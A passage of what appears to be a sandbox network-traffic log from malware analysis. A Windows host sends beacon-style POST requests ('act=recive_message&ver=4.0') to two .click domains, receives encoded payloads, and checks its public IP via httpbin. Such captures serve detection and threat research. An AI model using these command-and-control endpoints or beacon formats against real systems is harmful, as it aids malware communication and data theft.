{"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f46439cdaeede9b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1490&min_rtt=1488&rtt_var=562&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=909&delivery_rate=1937624&cwnd=192&unsent_bytes=0&cid=e58eb2e9f56a8766&ts=13255&x=0"
2024-12-19 09:11:27 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-19 09:11:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.6	50086	104.21.12.88	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:11:21 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 42 Host: lossekniyyt.click
2024-12-19 09:11:21 UTC	42	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 39 5a 31 63 79 63 2d 2d 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=9Z1cyc--&j=
2024-12-19 09:11:35 UTC	1135	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:11:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2qirdota1jtckoj03hiolldr3u; expires=Mon, 14 Apr 2025 02:58:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gsnoj9uFv%2BOVzZPmYAABKo7%2BhHqbwZbSvVhF4PRXOSYkOcGsU%2FrvRFlL16iSOYOyibl2akrlgZNh2T5uJ9JnjliYr%2Fn7AR2Mzw33DF%2F5ICjmw2YDuTg9cnKkvo2TfXOYh8MujA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4643c99e9a1a48-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1946&min_rtt=1940&rtt_var=740&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=943&delivery_rate=1466599&cwnd=157&unsent_bytes=0&cid=76acf4b8c348ce4c&ts=13474&x=0"
2024-12-19 09:11:35 UTC	234	IN	Data Raw: 63 34 62 0d 0a 4e 6e 75 52 33 72 55 74 78 35 36 76 75 4c 6f 78 36 57 67 4b 5a 51 46 31 64 79 59 71 54 73 49 57 61 30 6d 62 47 78 77 75 43 34 35 4e 57 65 66 38 6a 78 6e 72 76 4e 7a 64 6d 41 75 64 47 6e 38 41 4c 56 63 57 51 67 68 30 70 48 63 48 4f 76 34 33 50 6c 68 6d 72 41 77 64 38 4c 4c 47 53 4f 75 38 79 73 43 59 43 37 49 54 4b 41 42 76 56 30 30 45 54 79 53 67 64 77 63 72 2b 6e 42 7a 58 6d 66 74 58 68 66 32 74 74 42 4f 6f 2f 2f 44 31 64 39 55 6a 41 6c 67 43 32 67 59 48 30 73 49 59 75 42 7a 45 57 75 68 4f 56 46 4c 66 2b 39 37 47 75 4b 31 6c 31 44 72 35 59 33 64 31 42 50 54 53 6d 73 41 59 78 6b 52 51 6b 45 6d 71 6e 34 50 4b 76 39 78 62 45 64 74 35 6c 34 5a 39 62 66 61 52 37 66 79 79 64 4c 55 55 Data Ascii: c4bNnuR3rUtx56vuLox6WgKZQF1dyYqTsIWa0mbGxwuC45NWef8jxnrvNzdmAudGn8ALVcWQgh0pHcHOv43PlhmrAwd8LLGSOu8ysCYC7ITKABvV00ETySgdwcr+nBzXmftXhf2ttBOo//D1d9UjAlgC2gYH0sIYuBzEWuhOVFLf+97GuK1l1Dr5Y3d1BPTSmsAYxkRQkEmqn4PKv9xbEdt5l4Z9bfaR7fyydLUU
2024-12-19 09:11:35 UTC	1369	IN	Data Raw: 6f 59 4a 4b 45 6b 6a 45 41 30 45 45 47 7a 7a 52 67 6f 36 36 47 78 7a 58 47 2b 73 53 31 66 71 2f 4e 42 44 35 61 53 4e 30 74 52 64 6a 67 6c 6e 41 47 49 58 42 30 74 49 4c 36 68 38 44 53 48 32 64 6e 46 43 59 2b 74 63 45 50 53 7a 30 45 65 6a 38 38 36 61 6c 68 4f 4d 45 69 68 66 49 7a 63 46 52 30 73 34 72 57 56 4a 4e 4c 64 67 50 6b 74 6c 72 41 78 5a 39 62 4c 57 51 71 58 75 78 64 48 54 56 70 6b 42 59 51 70 75 46 78 68 4f 52 79 2b 67 63 77 4d 68 39 6e 4e 36 51 57 54 71 56 42 6d 7a 38 70 64 49 76 62 79 56 6d 76 74 57 6d 77 31 6b 45 53 45 74 56 56 73 47 4e 65 42 7a 42 57 75 68 4f 58 5a 4a 61 75 39 66 46 76 43 30 33 46 32 6c 37 73 76 58 33 55 47 4e 44 32 59 4e 59 41 55 66 53 6b 34 76 71 58 38 41 4c 76 35 39 50 67 49 70 36 30 78 5a 71 2f 7a 32 51 71 37 77 78 38 33 59 Data Ascii: oYJKEkjEA0EEGzzRgo66GxzXG+sS1fq/NBD5aSN0tRdjglnAGIXB0tIL6h8DSH2dnFCY+tcEPSz0Eej886alhOMEihfIzcFR0s4rWVJNLdgPktlrAxZ9bLWQqXuxdHTVpkBYQpuFxhORy+gcwMh9nN6QWTqVBmz8pdIvbyVmvtWmw1kESEtVVsGNeBzBWuhOXZJau9fFvC03F2l7svX3UGND2YNYAUfSk4vqX8ALv59PgIp60xZq/z2Qq7wx83Y
2024-12-19 09:11:35 UTC	1369	IN	Data Raw: 6f 48 62 77 55 5a 54 6b 34 6a 72 58 68 4a 5a 62 6c 2b 5a 67 77 78 72 48 34 61 35 37 2f 64 44 5a 44 2f 77 39 54 66 52 63 73 56 4a 68 34 6a 45 42 6b 45 45 47 79 74 64 51 45 74 36 33 5a 7a 54 32 66 69 57 78 7a 38 74 4e 64 50 71 50 6e 4a 30 64 4e 51 68 67 35 36 44 57 4d 66 45 45 56 43 4a 75 41 36 53 53 7a 68 4f 53 59 4d 57 50 74 66 57 38 61 2f 32 55 47 69 36 6f 33 46 6c 6b 72 4c 44 57 52 48 4f 31 63 59 54 45 30 70 72 33 55 44 4a 66 78 7a 63 6b 52 6e 37 30 59 57 39 37 7a 62 52 36 2f 78 77 39 37 51 57 6f 41 42 62 67 64 69 48 56 55 4b 43 43 75 34 4e 46 46 72 7a 58 35 79 51 57 61 75 59 52 72 39 73 74 42 5a 35 65 4f 44 77 35 68 55 68 30 6f 77 52 32 38 65 46 55 39 43 4b 4b 42 7a 42 43 37 36 66 6e 31 42 62 75 5a 61 48 76 65 77 33 6b 4b 6a 2f 4d 72 65 33 55 47 4f 41 Data Ascii: oHbwUZTk4jrXhJZbl+ZgwxrH4a57/dDZD/w9TfRcsVJh4jEBkEEGytdQEt63ZzT2fiWxz8tNdPqPnJ0dNQhg56DWMfEEVCJuA6SSzhOSYMWPtfW8a/2UGi6o3FlkrLDWRHO1cYTE0pr3UDJfxzckRn70YW97zbR6/xw97QWoABbgdiHVUKCCu4NFFrzX5yQWauYRr9stBZ5eODw5hUh0owR28eFU9CKKBzBC76fn1BbuZaHvew3kKj/Mre3UGOA
2024-12-19 09:11:35 UTC	182	IN	Data Raw: 69 47 31 49 49 4d 2b 35 74 53 53 7a 31 4f 53 59 4d 59 4f 56 47 46 2f 32 31 32 6b 6d 74 2b 38 50 58 30 31 57 41 44 57 38 42 62 68 38 59 51 55 73 74 70 48 34 62 4b 50 4a 7a 63 30 59 70 6f 68 51 65 36 2f 79 50 44 34 4c 77 35 4d 72 44 51 5a 31 4b 64 30 6c 36 56 78 4a 49 43 48 54 67 64 77 59 69 39 6e 46 32 51 32 62 6f 57 68 2f 31 73 64 4a 41 72 2b 37 46 31 4e 56 59 68 41 46 36 42 32 34 54 47 55 42 41 4a 36 6f 30 52 32 76 2b 59 54 34 55 4b 64 6c 5a 46 76 4f 2f 77 51 2b 36 73 74 53 61 33 31 2f 4c 55 69 67 4c 62 52 63 61 53 45 51 6e 71 48 55 0d 0a Data Ascii: iG1IIM+5tSSz1OSYMYOVGF/212kmt+8PX01WADW8Bbh8YQUstpH4bKPJzc0YpohQe6/yPD4Lw5MrDQZ1Kd0l6VxJICHTgdwYi9nF2Q2boWh/1sdJAr+7F1NVYhAF6B24TGUBAJ6o0R2v+YT4UKdlZFvO/wQ+6stSa31/LUigLbRcaSEQnqHU
2024-12-19 09:11:35 UTC	1369	IN	Data Raw: 33 63 64 31 0d 0a 46 4a 66 35 38 64 30 52 68 2f 6c 55 64 2b 37 33 5a 51 4b 54 34 79 4e 2f 63 56 49 38 4d 5a 30 63 74 56 78 4a 63 43 48 54 67 57 79 34 65 75 31 68 45 44 48 61 69 54 56 6e 30 73 4a 63 58 35 66 44 4f 31 74 42 63 6a 51 4e 6b 44 57 6f 63 47 55 39 4d 49 4b 6c 78 44 79 72 38 66 48 39 49 5a 65 5a 53 47 76 43 7a 32 45 43 74 76 49 4f 61 33 30 76 4c 55 69 67 69 64 42 77 62 51 67 67 7a 37 6d 31 4a 4c 50 55 35 4a 67 78 6c 35 56 49 66 39 72 44 57 53 61 33 35 78 64 37 5a 56 59 30 4a 5a 77 4e 6d 46 68 70 41 52 43 4b 71 64 51 67 6e 38 6e 5a 31 53 53 6d 69 46 42 37 72 2f 49 38 50 6c 50 2f 62 7a 63 68 66 79 78 55 6d 48 69 4d 51 47 51 51 51 62 4b 46 6d 41 79 48 33 66 48 46 4a 61 75 4e 54 46 50 57 77 33 55 61 74 2b 73 4c 54 79 6c 43 48 42 47 38 4a 62 78 6b 59 Data Ascii: 3cd1FJf58d0Rh/lUd+73ZQKT4yN/cVI8MZ0ctVxJcCHTgWy4eu1hEDHaiTVn0sJcX5fDO1tBcjQNkDWocGU9MIKlxDyr8fH9IZeZSGvCz2ECtvIOa30vLUigidBwbQggz7m1JLPU5Jgxl5VIf9rDWSa35xd7ZVY0JZwNmFhpARCKqdQgn8nZ1SSmiFB7r/I8PlP/bzchfyxUmHiMQGQQQbKFmAyH3fHFJauNTFPWw3Uat+sLTylCHBG8JbxkY
2024-12-19 09:11:35 UTC	1369	IN	Data Raw: 64 39 41 6a 6e 7a 66 6e 6c 48 59 65 64 62 48 2b 47 77 32 56 32 67 37 74 2b 61 6c 68 4f 4d 45 69 68 66 49 79 45 53 56 46 67 76 34 6b 55 66 4b 4f 39 79 63 30 41 70 38 78 6f 41 73 37 76 62 44 2f 32 38 79 39 58 52 55 49 51 4c 59 51 74 75 45 68 78 42 53 53 71 6b 66 67 4d 72 2f 33 39 2f 53 57 50 76 56 52 50 36 75 39 39 49 70 75 36 4e 6c 4a 68 55 6b 30 6f 77 52 30 6f 51 42 30 70 59 62 4c 38 36 45 47 76 2b 64 54 34 55 4b 65 68 65 46 76 65 37 32 30 6d 67 2b 73 44 62 31 31 4b 4c 42 57 77 4d 61 68 45 55 53 55 30 68 70 47 59 44 49 50 5a 31 64 30 42 6b 72 42 70 5a 39 4b 53 58 46 2b 58 4e 77 4e 54 57 56 4a 31 4b 64 30 6c 36 56 78 4a 49 43 48 54 67 64 51 55 6b 2b 6e 5a 39 54 32 6a 6d 52 67 76 2f 74 64 39 4b 71 66 66 44 33 4d 70 56 68 41 4e 72 42 47 6f 51 48 55 68 43 4c Data Ascii: d9AjnzfnlHYedbH+Gw2V2g7t+alhOMEihfIyESVFgv4kUfKO9yc0Ap8xoAs7vbD/28y9XRUIQLYQtuEhxBSSqkfgMr/39/SWPvVRP6u99Ipu6NlJhUk0owR0oQB0pYbL86EGv+dT4UKeheFve720mg+sDb11KLBWwMahEUSU0hpGYDIPZ1d0BkrBpZ9KSXF+XNwNTWVJ1Kd0l6VxJICHTgdQUk+nZ9T2jmRgv/td9KqffD3MpVhANrBGoQHUhCL
2024-12-19 09:11:35 UTC	1369	IN	Data Raw: 72 6f 57 39 75 57 32 37 7a 47 67 43 7a 75 39 73 50 2f 62 7a 4c 30 39 35 55 6a 51 52 36 41 6d 55 59 47 6b 31 42 4b 4b 68 33 43 53 2f 39 66 6e 74 50 5a 65 64 54 47 76 79 34 33 6b 47 73 38 34 32 55 6d 46 53 54 53 6a 42 48 51 67 77 57 53 45 56 73 76 7a 6f 51 61 2f 35 31 50 68 51 70 34 46 6f 63 38 37 62 52 53 36 44 36 78 39 2f 59 57 49 67 46 62 41 46 6e 47 42 56 50 51 53 32 6d 63 51 4d 67 2f 33 52 39 53 6d 2b 73 47 6c 6e 30 70 4a 63 58 35 64 7a 57 31 39 52 55 79 78 55 6d 48 69 4d 51 47 51 51 51 62 4b 74 34 44 53 7a 35 64 48 31 45 62 4f 68 65 48 50 4f 30 78 55 65 6c 2b 39 2f 49 32 46 71 4f 42 6d 73 48 5a 78 45 63 51 6b 73 6f 34 44 70 4a 4c 4f 45 35 4a 67 78 45 34 46 4d 77 39 4b 65 58 55 4f 76 6c 6a 64 33 55 45 39 4e 4b 61 51 78 70 47 42 68 48 54 69 2b 72 63 51 Data Ascii: roW9uW27zGgCzu9sP/bzL095UjQR6AmUYGk1BKKh3CS/9fntPZedTGvy43kGs842UmFSTSjBHQgwWSEVsvzoQa/51PhQp4Foc87bRS6D6x9/YWIgFbAFnGBVPQS2mcQMg/3R9Sm+sGln0pJcX5dzW19RUyxUmHiMQGQQQbKt4DSz5dH1EbOheHPO0xUel+9/I2FqOBmsHZxEcQkso4DpJLOE5JgxE4FMw9KeXUOvljd3UE9NKaQxpGBhHTi+rcQ
2024-12-19 09:11:35 UTC	1369	IN	Data Raw: 50 6c 6f 70 74 41 5a 58 73 36 36 58 46 2b 57 37 7a 73 6a 4b 56 59 67 63 61 30 42 64 4b 54 4a 53 51 69 75 77 63 78 34 6b 75 54 63 2b 51 79 6d 30 62 56 6e 36 75 38 78 65 73 2f 48 64 33 5a 68 73 78 55 70 77 52 7a 74 58 49 45 64 47 49 71 64 69 47 47 62 65 62 33 52 4c 65 65 74 44 46 72 50 79 6c 30 6e 6c 70 4a 36 55 6d 46 65 61 53 6a 42 58 4d 55 78 41 46 78 39 38 38 6d 74 48 4d 72 6c 76 50 68 51 37 6f 68 51 4c 73 2b 53 58 43 4b 62 75 33 39 7a 62 52 59 68 4e 56 6a 6c 45 44 52 68 43 58 7a 32 65 53 67 34 78 39 48 39 70 58 53 58 35 56 78 66 39 75 38 45 50 36 37 7a 43 6d 6f 42 71 79 30 49 6f 4f 43 31 58 44 51 51 51 62 4a 56 33 42 79 58 2b 62 32 38 42 54 76 5a 5a 48 2b 53 74 6c 77 48 6c 2b 6f 32 43 69 42 33 4c 44 6e 6c 48 4f 30 64 48 48 78 31 2f 39 79 52 62 4e 4c 64 Data Ascii: PloptAZXs66XF+W7zsjKVYgca0BdKTJSQiuwcx4kuTc+Qym0bVn6u8xes/Hd3ZhsxUpwRztXIEdGIqdiGGbeb3RLeetDFrPyl0nlpJ6UmFeaSjBXMUxAFx988mtHMrlvPhQ7ohQLs+SXCKbu39zbRYhNVjlEDRhCXz2eSg4x9H9pXSX5Vxf9u8EP67zCmoBqy0IoOC1XDQQQbJV3ByX+b28BTvZZH+StlwHl+o2CiB3LDnlHO0dHHx1/9yRbNLd
2024-12-19 09:11:35 UTC	1369	IN	Data Raw: 75 4a 61 48 75 57 74 6c 77 48 6c 38 34 32 43 34 52 50 44 53 6c 64 4a 49 77 39 56 48 41 67 5a 6f 33 6f 48 4c 4f 39 6f 4d 32 74 6e 36 31 55 50 34 36 76 59 44 2b 75 38 79 35 71 41 41 63 56 4b 62 42 59 6a 54 30 55 57 45 33 6e 7a 49 31 6c 35 35 6a 64 6e 44 48 2b 73 44 45 75 39 2f 4d 55 50 2f 62 79 4b 32 63 70 42 6a 51 6c 2b 42 43 51 70 4b 32 4e 47 4b 36 46 69 47 54 7a 32 4e 6c 42 36 53 4e 4a 71 44 50 43 79 32 55 69 7a 37 59 32 55 6d 46 7a 4c 55 6c 46 48 4b 31 63 71 43 67 67 30 34 43 78 4a 48 76 70 33 63 45 74 2f 2f 52 6b 2b 2f 62 76 57 57 62 58 72 77 70 58 32 5a 61 70 4b 4a 6b 64 6c 56 30 30 57 42 6d 79 6b 5a 55 6c 7a 71 53 73 6c 47 54 71 37 42 45 76 73 38 73 34 50 73 37 79 56 69 4a 59 54 6d 55 6f 77 52 79 51 55 42 31 5a 4f 4c 37 5a 33 54 68 58 48 58 6e 42 4c Data Ascii: uJaHuWtlwHl842C4RPDSldJIw9VHAgZo3oHLO9oM2tn61UP46vYD+u8y5qAAcVKbBYjT0UWE3nzI1l55jdnDH+sDEu9/MUP/byK2cpBjQl+BCQpK2NGK6FiGTz2NlB6SNJqDPCy2Uiz7Y2UmFzLUlFHK1cqCgg04CxJHvp3cEt//Rk+/bvWWbXrwpX2ZapKJkdlV00WBmykZUlzqSslGTq7BEvs8s4Ps7yViJYTmUowRyQUB1ZOL7Z3ThXHXnBL

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.6	50088	34.226.108.155	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:11:28 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2024-12-19 09:11:29 UTC	224	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:11:29 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2024-12-19 09:11:29 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.6	50090	172.67.177.88	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:11:28 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 42 Host: cheapptaxysu.click
2024-12-19 09:11:28 UTC	42	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 43 5a 4a 76 73 73 2d 2d 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=CZJvss--&j=
2024-12-19 09:11:39 UTC	1127	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:11:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2c3921r3immk0p7lhvqiln5dc2; expires=Mon, 14 Apr 2025 02:58:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s2dUTc7qEZ1Ux4vaC7%2BKyFdB9ce0wvU2Z05aFKgs26IhHyFMHM1%2FfjSCjet7iuqtRJxhOacRgsROVfPiuykGYZJtAgdlg86R2un9sgRdwIonUplMS7WKvF40W1yAZJSLm2ZaEB8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4643f7da3c5e7d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1908&min_rtt=1897&rtt_var=733&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=944&delivery_rate=1471032&cwnd=224&unsent_bytes=0&cid=0902e2f8d1fc66ba&ts=10987&x=0"
2024-12-19 09:11:39 UTC	242	IN	Data Raw: 34 36 63 0d 0a 53 42 52 48 33 50 31 44 63 38 47 79 55 2b 77 70 42 33 64 36 34 32 46 70 52 71 72 31 31 35 2f 45 4f 2f 51 63 56 61 52 39 6e 44 55 7a 4e 6a 48 2b 78 33 64 66 34 38 45 32 7a 68 4e 7a 42 51 2b 47 54 55 73 6e 7a 74 66 74 2b 61 56 58 68 33 6c 35 68 67 76 78 46 33 4a 79 4a 72 43 4f 4a 6c 2f 6a 31 79 76 4f 45 31 77 4d 57 49 59 50 53 33 79 49 6b 4c 33 39 70 56 65 57 66 54 37 4c 44 66 42 57 49 48 67 67 74 4a 67 67 46 36 44 65 50 6f 6c 4d 59 68 59 51 6a 51 67 45 4c 73 66 58 2b 37 32 68 51 64 59 6d 64 2b 6b 59 36 46 51 46 64 54 53 33 33 7a 35 66 75 70 41 32 67 67 73 39 56 52 75 47 41 77 55 67 7a 70 36 2f 39 36 78 66 6c 33 67 2f 31 42 54 36 58 53 42 32 49 37 57 53 4b 51 4f 74 31 44 6d 43 53 6d 67 57 57 4d 39 44 44 Data Ascii: 46cSBRH3P1Dc8GyU+wpB3d642FpRqr115/EO/QcVaR9nDUzNjH+x3df48E2zhNzBQ+GTUsnztft+aVXh3l5hgvxF3JyJrCOJl/j1yvOE1wMWIYPS3yIkL39pVeWfT7LDfBWIHggtJggF6DePolMYhYQjQgELsfX+72hQdYmd+kY6FQFdTS33z5fupA2ggs9VRuGAwUgzp6/96xfl3g/1BT6XSB2I7WSKQOt1DmCSmgWWM9DD
2024-12-19 09:11:39 UTC	897	IN	Data Raw: 44 79 49 7a 2f 57 75 6c 46 71 48 62 79 4c 4c 44 2f 67 58 4e 54 67 38 2f 70 67 74 55 66 75 51 4f 59 4a 46 59 42 59 58 68 67 49 4c 4e 73 65 58 74 76 57 75 58 5a 78 78 4f 4d 6b 52 39 46 41 69 66 79 4b 78 6d 43 6b 58 72 4e 4e 78 77 41 74 69 44 56 6a 5a 51 79 73 30 79 35 53 68 38 4c 63 5a 69 54 41 75 68 68 6a 79 46 33 49 32 49 37 43 65 4c 42 47 78 32 44 71 46 54 6e 63 65 45 59 77 4f 43 79 6e 43 6d 4c 62 39 6f 56 4f 63 63 54 33 43 45 76 4e 52 4b 6e 5a 6c 38 4e 38 6d 43 65 4f 49 63 61 31 4f 64 52 49 55 6c 30 45 78 5a 4e 66 5a 72 4c 32 68 56 64 59 6d 64 38 34 61 2f 56 51 68 65 53 61 32 6c 44 4d 52 73 64 59 38 69 31 6c 6a 45 42 61 4c 41 42 6b 75 78 70 47 32 39 4b 31 51 6b 33 6b 7a 68 6c 47 2b 55 44 49 32 66 66 36 2b 4c 42 71 76 32 69 61 4f 43 33 70 62 41 63 45 45 Data Ascii: DyIz/WulFqHbyLLD/gXNTg8/pgtUfuQOYJFYBYXhgILNseXtvWuXZxxOMkR9FAifyKxmCkXrNNxwAtiDVjZQys0y5Sh8LcZiTAuhhjyF3I2I7CeLBGx2DqFTnceEYwOCynCmLb9oVOccT3CEvNRKnZl8N8mCeOIca1OdRIUl0ExZNfZrL2hVdYmd84a/VQheSa2lDMRsdY8i1ljEBaLABkuxpG29K1Qk3kzhlG+UDI2ff6+LBqv2iaOC3pbAcEE
2024-12-19 09:11:39 UTC	1369	IN	Data Raw: 34 34 62 30 0d 0a 42 53 50 65 31 36 71 7a 76 78 6d 52 63 6e 65 65 58 2f 46 59 4a 58 34 6c 76 35 73 73 46 61 4c 64 50 59 64 49 61 52 6b 51 6a 41 38 50 4b 38 43 66 74 76 57 30 56 35 68 34 4d 63 59 61 76 68 6c 71 63 54 33 2b 78 32 45 31 72 63 63 6c 68 51 6c 51 46 68 61 50 42 42 31 6b 31 39 6d 73 76 61 46 56 31 69 5a 33 79 42 4c 31 57 79 31 2f 4a 4c 32 66 4b 78 2b 73 32 6a 6d 47 53 32 67 55 45 34 6b 46 42 69 2f 48 6d 4c 4c 31 70 56 57 54 63 7a 53 47 55 62 35 51 4d 6a 5a 39 2f 72 6f 76 45 72 4c 42 63 37 74 49 61 78 73 66 6c 30 4d 55 61 74 48 58 73 76 48 6d 41 64 5a 30 4d 4d 45 62 38 31 30 70 63 69 47 7a 6b 43 67 59 71 73 49 37 67 6b 56 33 47 42 4b 45 44 51 63 68 78 35 65 30 2f 4b 68 54 6e 54 35 35 68 68 6a 6d 46 33 49 32 43 72 4f 50 4d 78 75 6f 77 58 4f 37 53 Data Ascii: 44b0BSPe16qzvxmRcneeX/FYJX4lv5ssFaLdPYdIaRkQjA8PK8CftvW0V5h4McYavhlqcT3+x2E1rcclhQlQFhaPBB1k19msvaFV1iZ3yBL1Wy1/JL2fKx+s2jmGS2gUE4kFBi/HmLL1pVWTczSGUb5QMjZ9/rovErLBc7tIaxsfl0MUatHXsvHmAdZ0MMEb810pciGzkCgYqsI7gkV3GBKEDQchx5e0/KhTnT55hhjmF3I2CrOPMxuowXO7S
2024-12-19 09:11:39 UTC	1369	IN	Data Raw: 5a 51 79 51 6e 33 70 33 31 34 75 68 41 31 6e 6b 37 68 6b 65 2b 58 53 5a 79 4a 72 4b 57 4c 52 79 69 31 44 61 44 54 32 55 54 48 6f 51 43 41 43 7a 45 6d 4c 2f 78 6f 6c 57 66 65 44 76 46 48 50 67 58 5a 44 59 69 70 74 39 35 55 59 4c 64 4f 6f 4a 4c 5a 67 51 66 77 55 31 4c 4b 73 36 58 39 61 57 77 53 59 46 35 4b 49 67 47 76 6c 41 6d 4e 6e 33 2b 6c 54 4d 55 72 64 51 37 69 30 39 70 48 78 69 45 45 51 4d 69 7a 35 75 39 2b 4b 6c 66 6b 33 4d 77 7a 52 7a 73 52 53 6c 79 4b 37 4c 66 62 31 47 6b 79 48 48 57 43 30 41 43 47 35 45 46 43 47 54 58 32 61 79 39 6f 56 58 57 4a 6e 66 47 45 66 4a 63 4c 58 30 75 75 70 73 68 48 4b 6a 65 50 34 64 48 62 52 6b 66 6b 77 34 4f 4c 4d 4b 65 73 50 47 72 57 6f 52 39 4e 6f 5a 52 76 6c 41 79 4e 6e 33 2b 75 42 49 6d 67 4a 41 75 77 46 49 6c 45 68 Data Ascii: ZQyQn3p314uhA1nk7hke+XSZyJrKWLRyi1DaDT2UTHoQCACzEmL/xolWfeDvFHPgXZDYipt95UYLdOoJLZgQfwU1LKs6X9aWwSYF5KIgGvlAmNn3+lTMUrdQ7i09pHxiEEQMiz5u9+Klfk3MwzRzsRSlyK7Lfb1GkyHHWC0ACG5EFCGTX2ay9oVXWJnfGEfJcLX0uupshHKjeP4dHbRkfkw4OLMKesPGrWoR9NoZRvlAyNn3+uBImgJAuwFIlEh
2024-12-19 09:11:39 UTC	1369	IN	Data Raw: 43 4d 75 59 76 72 32 35 46 34 38 2b 4d 4d 70 66 70 68 63 74 66 69 32 77 6e 43 63 61 72 39 77 77 68 30 31 67 48 52 2b 4f 42 41 49 6a 79 4a 47 6e 2b 71 74 51 6c 6e 55 2b 7a 42 76 2f 58 47 6f 34 5a 62 6d 48 59 55 6e 6a 34 6a 61 59 57 32 5a 56 42 38 38 61 53 79 50 45 31 2b 32 39 71 30 75 58 65 79 58 43 45 50 56 46 49 58 41 6c 75 34 30 6d 48 61 6e 66 4d 6f 5a 47 5a 68 30 4b 67 51 34 4c 4e 74 71 52 76 76 50 6d 46 39 5a 35 4c 34 5a 48 76 6d 59 39 66 57 57 68 30 54 68 52 70 4e 78 78 31 67 74 6d 48 78 57 50 45 51 38 69 77 35 53 37 39 61 4e 52 6b 6e 51 36 79 52 54 30 58 69 4a 32 4b 72 75 58 4b 68 65 74 30 54 65 43 52 69 56 62 57 49 59 62 53 33 79 49 73 4b 2f 77 6f 45 36 48 53 7a 44 47 54 72 35 49 5a 47 39 6c 75 5a 4e 68 53 65 50 64 50 59 52 47 59 42 45 51 68 67 41 Data Ascii: CMuYvr25F48+MMpfphctfi2wnCcar9wwh01gHR+OBAIjyJGn+qtQlnU+zBv/XGo4ZbmHYUnj4jaYW2ZVB88aSyPE1+29q0uXeyXCEPVFIXAlu40mHanfMoZGZh0KgQ4LNtqRvvPmF9Z5L4ZHvmY9fWWh0ThRpNxx1gtmHxWPEQ8iw5S79aNRknQ6yRT0XiJ2KruXKhet0TeCRiVbWIYbS3yIsK/woE6HSzDGTr5IZG9luZNhSePdPYRGYBEQhgA
